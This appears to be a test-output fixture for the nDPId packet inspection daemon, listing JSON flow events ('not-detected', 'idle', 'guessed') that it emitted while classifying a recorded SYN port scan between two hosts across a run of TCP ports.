-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
